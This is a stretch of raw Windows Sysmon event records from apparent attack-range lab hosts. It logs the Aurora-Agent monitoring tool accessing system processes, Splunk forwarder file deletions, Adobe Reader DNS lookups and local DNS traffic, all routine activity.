(x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047206Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.779{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047205Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.762{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047204Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.730{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047203Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.722{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047202Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.718{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047201Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.713{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047200Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.706{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047199Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.702{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047198Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.701{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047197Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.695{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047196Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.692{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047195Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.691{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047194Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.688{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047193Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.681{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 23542300x800000000000000047192Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.305{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69E9A3F62D338CECC9DBFD438FA5CAF7,SHA256=39FFDC3AB5B9565AB2C12333C7B6CC24AFFDD7EA7ECFE7BD170C8CFED22F5C4C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 22542200x800000000000000047191Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.713{FE4C2B44-E652-63C7-8C06-00000000AF02}7044geo2.adobe.com0type: 5 ssl-delivery.adobe.com.edgekey.net;type: 5 e4578.dscg.akamaiedge.net;23.45.144.156;C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000047190Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.167{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047189Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.166{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 23542300x800000000000000018723Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:15.531{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5491128646A656195C8F185E55093644,SHA256=E8A683260BB5EE3D8DDCD27C6F1083E30EC52CC64942D8A156C35C0CB19FAB21,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000047236Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:15.942{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E653-63C7-8F06-00000000AF02}6444C:\Windows\system32\DllHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047235Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:15.938{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E653-63C7-8E06-00000000AF02}7120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047234Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:15.930{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047233Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:15.923{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047232Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:15.921{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047231Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:15.919{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 23542300x800000000000000047230Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:15.407{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2F74CBE682C442FA33A6EE422EAA4FE,SHA256=6863D7F26148D87585426E2FD50F5DDC8AB6767DBCC3CDDF614D5800C673AA83,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 22542200x800000000000000047229Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.875{FE4C2B44-E652-63C7-8C06-00000000AF02}7044p13n.adobe.io034.193.227.236;18.207.85.246;107.22.247.231;54.144.73.197;C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 354300x800000000000000018726Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:13.899{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50193-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018725Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:16.607{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E34515AB3878B8EB2ABAE4C1128A5E6D,SHA256=6F709DDAB09975D8BCCEC465F238320C30DCDD54C9925B78F40CD4B311737899,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000047242Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.254{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1-51114-false127.0.0.1-53domain 354300x800000000000000047241Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.238{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51114- 354300x800000000000000047240Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.238{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:2600:0:9860:64eb:6c3:ffff-51114-true7f00:1:0:0:0:0:0:0-53domain 354300x800000000000000047239Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.213{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local51114- 354300x800000000000000047238Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.213{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local50542- 23542300x800000000000000047237Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:16.344{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAE72DA93370AEFD8D55572BEFCD61BA,SHA256=3E6357F09627FB53DBCE1D26A937E13768EC23231342375F5E75BBE8A43AE2D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018724Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:16.491{E5A8D418-DC43-63C7-1200-00000000B002}1012NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=F57CE3BBD982ADD9271304EF3CB507F6,SHA256=DE38C3C013874B361CAE714AE030266CEFB2EA4E4CCEB0E0BCE9C22965C943D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018737Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:17.707{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CDA80344BE493817CBE36EC1421CE6F,SHA256=BF6129A1C4AFBA6F35B44049BB0F7904E94C34E61EF10D808B606AD841013D66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000047243Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:17.432{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91EE19B8D1FC3F02E5F7AE3FD6D3BDD6,SHA256=01A8A98896A9BDC72FA45E070897F8D76B8A337B8A22FCB4A9EB5990D123893C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 